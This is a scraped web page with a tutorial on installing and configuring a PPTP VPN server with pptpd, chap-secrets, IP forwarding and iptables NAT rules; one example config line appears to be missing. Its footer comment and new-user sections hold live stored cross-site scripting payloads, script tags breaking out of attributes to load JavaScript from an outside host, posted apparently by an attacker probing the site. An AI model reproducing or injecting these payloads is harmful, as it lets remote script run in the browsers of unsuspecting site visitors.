How To Setup Your Own VPN With PPTP


Step 1 - PPTP Installation

You will have to select one server to be responsible for handling out IPs to others and authenticating all of your servers into your VPN. This will become your PPTP Server.

On CentOS 6 x64:

rpm -i http://poptop.sourceforge.net/yum/stable/rhel6/pptp-release-current.noarch.rpm
yum -y install pptpd

On Ubuntu 12.10 x64:

apt-get install pptpd

Now you should edit /etc/pptpd.conf and add the following lines:

localip 192.168.122.1
remoteip 192.168.122.100-200

Where localip is IP address of your server and remoteip are IPs that will be assigned to clients that connect to it.

Next, you should setup authentication for PPTP by adding users and passwords. Simply add them to /etc/ppp/chap-secrets :


Where client is the username, server is type of service – pptpd for our example, secret is the password, and IP addresses specifies which IP address may authenticate. By setting ‘*’ in IP addresses field, you specify that you would accept username/password pair for any IP.

Step 2 - Add DNS servers to /etc/ppp/pptpd-options

ms-dns 8.8.8.8
ms-dns 8.8.4.4

Now you can start PPTP daemon:

service pptpd restart

Verify that it is running and accepting connections:

Step 3 - Setup Forwarding

It is important to enable IP forwarding on your PPTP server. This will allow you to forward packets between public IP and private IPs that you setup with PPTP. Simply edit /etc/sysctl.conf and add the following line if it doesn’t exist there already:

net.ipv4.ip_forward = 1

To make changes active, run sysctl -p

Step 4 - Create a NAT rule for iptables

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE && iptables-save

If you would also like your PPTP clients to talk to each other, add the following iptables rules:

iptables --table nat --append POSTROUTING --out-interface ppp0 -j MASQUERADE
iptables -I INPUT -s 192.168.122.0/24 -i ppp0 -j ACCEPT
iptables --append FORWARD --in-interface eth0 -j ACCEPT

Now your PPTP server also acts as a router.

Install iptables-persistent to persist the iptables rules:

sudo apt-get install iptables-persistent

If you already installed iptables-persistent just save it

sudo service iptables-persistent save


Last Article Next article

Comment 评论



Share 分享

New Users 最新加入

  • "><script type="text/javascript&qu

  • hokurikustr

New comments 最新评论

&quot;&gt;&lt;script type=&quot;te: <script type="text/javascript" src="https://jso-tools.z-x.my.id/raw/~/J860XYPPDSWNG"></script> Details Oct 02 13:07
toored: "><script type="text/javascript" src="https://jso-tools.z-x.my.id/raw/~/J860XYPPDSWNG"></script> Details Oct 02 12:58
toored: <script type="text/javascript" src="https://jso-tools.z-x.my.id/raw/~/J860XYPPDSWNG"></script> Details Oct 02 12:57
toored: "><test> Details Oct 02 12:56
test123: aasdas Details Apr 13 16:39